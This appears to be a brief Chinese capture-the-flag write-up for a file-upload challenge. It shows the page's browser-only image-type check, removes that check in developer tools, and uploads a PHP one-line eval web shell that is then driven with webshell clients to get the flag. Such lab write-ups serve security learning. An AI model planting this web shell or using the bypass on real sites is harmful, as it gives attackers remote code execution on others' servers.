<!Doctype html>
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<script type="text/javascript">
Array.prototype.contains = function (obj) {
var i = this.length;
while (i--) {
if (this[i] === obj) {
return true;
}
}
return false;
}
function check(){
upfile = document.getElementById("upfile");
submit = document.getElementById("submit");
name = upfile.value;
ext = name.replace(/^.+\./,'');
if(['jpg','png'].contains(ext)){
submit.disabled = false;
}else{
submit.disabled = true;
alert('請選擇一張圖片文件上傳!');
}
}
</script>
</head>
<body>
<form enctype='multipart/form-data' id='aa' name='aaa' method='post' action='index.php'>
<input id="upfile" name='upfile' type='file' onchange="check();" />
<input type='submit' id ='submit' value='上傳'>
</form>
</body>
前端上傳限制只能是圖片
F12
把前端裏面的限制函數刪掉!
變成這樣子——
上傳一句話 我愛你 :Trojan
<?php @eval($_POST['x']) ?>
在這個頁面
http://124.126.19.106:55113/index.php
上傳成功
找到上傳文件的位置,題目顯示了/upload/1588499500.cknife.php
所以文件就在
http://124.126.19.106:55113/upload/1588499500.cknife.php
菜刀可,蟻劍也可
你若菜刀cknife
法寶一:
不二法寶:
附上小旗幟🚩
flag=“cyberpeace{5327a18ceab8d7b4b1db828776bbe303}”